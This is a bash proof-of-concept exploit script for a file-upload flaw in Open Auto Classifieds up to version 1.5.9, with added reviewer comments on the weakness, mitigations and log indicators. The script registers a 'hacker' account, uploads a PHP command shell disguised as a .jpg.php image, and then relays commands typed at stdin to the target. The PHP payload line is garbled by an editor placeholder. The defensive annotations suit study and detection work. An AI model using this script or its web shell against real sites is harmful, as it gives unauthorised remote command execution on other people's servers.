#!/bin/bash
# File Upload exploit for Open Auto Classifieds version <= 1.5.9
#
# Researched by Andrew Horton (urbanadventurer)
# (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/
#
# Review notes (defender's reading of this PoC):
#   Weakness shown: the user-image upload handled by useredit.php accepts a
#   file whose name ends in ".php" (here a ".jpg.php" double extension), and
#   the stored file is then requested from images/users/ as a PHP script.
#   In other words, the upload is not restricted to image types and the
#   upload directory is web-reachable with script execution enabled.
#   Preconditions visible here: open self-registration (register.php) and a
#   normal login (login.php); no elevated account is used.
#   Mitigation: allow-list the final extension and verify the content
#   server-side, generate the stored file name on the server instead of
#   keeping the client-supplied one, keep uploads outside the document root or
#   disable script handling for images/users/, and move off the affected
#   versions (<= 1.5.9) -- fixed release not stated on this page, confirm
#   with the vendor.
#   Detection: any file under images/users/ with a script extension; web-log
#   requests to images/users/*.php, especially with a "cmd" parameter; a
#   register.php -> login.php -> multipart POST to useredit.php sequence from
#   one client whose upload filename ends in ".php".

# Usage guard: with no target argument, print help and stop. The bare `exit`
# returns the status of the last echo, so this path exits 0.
if [ -z "$1" ]; then
echo "Usage: $0 <target-url>"
echo "File upload proof of concept exploit for Open Auto Classifieds <= v 1.5.9"
echo "This will create a user with the name 'hacker' and pass '31337' then upload a command execution shell."
echo -e "eg. $0 http://www.myweb.com/cardealer/\n"
exit
fi
# Base URL of the application under test; every request below is built from it.
target="$1"
# Writes the upload payload to the current directory under a name that ends
# in ".jpg.php".
# NOTE(review): the payload text below is mangled on this page -- an editor
# placeholder token ("___FCKpd___0") and a line break sit inside the PHP -- and
# it is left exactly as found.
echo "<? print passthru(\___FCKpd___0
REQUEST['cmd']); ?>" > evilimage.jpg.php
echo "Registering user"
# Self-registers a fixed account ("hacker") through register.php; the session
# cookies go to ./cookiejar and the response is discarded. The fixed user name
# and e-mail value are usable as log/database indicators for this exact PoC.
curl -c cookiejar -d "user=hacker&pass=31337&email=foo%40bar.com&company_name=&first_name=Hack&last_name=Errr&phone=123+123+1234&alt_phone=&fax=&country=1&state=Badakhshan&city=&address=&zip=&submit=Submit&agree=agree" "$target/register.php" >/dev/null 2>&1
echo "Login"
# Logs in with the same credentials, reusing and updating the cookie jar.
curl -b cookiejar -c cookiejar -d "user=hacker&pass=31337&submit=Login" "$target/login.php" >/dev/null 2>&1
echo "Upload command shell as user image"
# Multipart POST to useredit.php: the "image" part carries the .jpg.php file.
# "max" is a client-supplied form field; NOTE(review): if the server relies on
# it as the size limit, that limit is attacker-controlled -- confirm in the
# application code.
curl -b cookiejar -c cookiejar -F "image=@evilimage.jpg.php" -F "max=524288" -F "addimage=Submit" "$target/useredit.php" >/dev/null 2>&1
# Reads member.php and pulls the 4-digit run(s) from the line that mentions
# "_thumb.jpg". Together with the URL built below, this implies the stored
# name is <username><4 digits><original filename>, i.e. the client-supplied
# name and extension survive and the number is disclosed to the uploader.
CODE=`curl -b cookiejar -c cookiejar "$target/member.php" 2>/dev/null | grep _thumb.jpg | egrep -o "[0-9]{4}"`
# Removes the local cookie jar and payload file; nothing is removed on the
# server, so the uploaded file and the "hacker" account remain as artifacts.
rm -f cookiejar evilimage.jpg.php
echo "Command shell found at : $target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id"
# First request to the uploaded file, with cmd=id in the query string; this
# is the access-log pattern named in the detection notes above.
curl "$target/images/users/hacker${CODE}evilimage.jpg.php?cmd=id" 2>/dev/null
# Reads lines from stdin and sends each one as a POST "cmd" field to the
# uploaded file. These values are in the request body, so they will not show
# in default access logs; body logging or a WAF is needed to see them.
while read cmd; do
curl -d "cmd=$cmd" "$target/images/users/hacker${CODE}evilimage.jpg.php" 2>/dev/null
done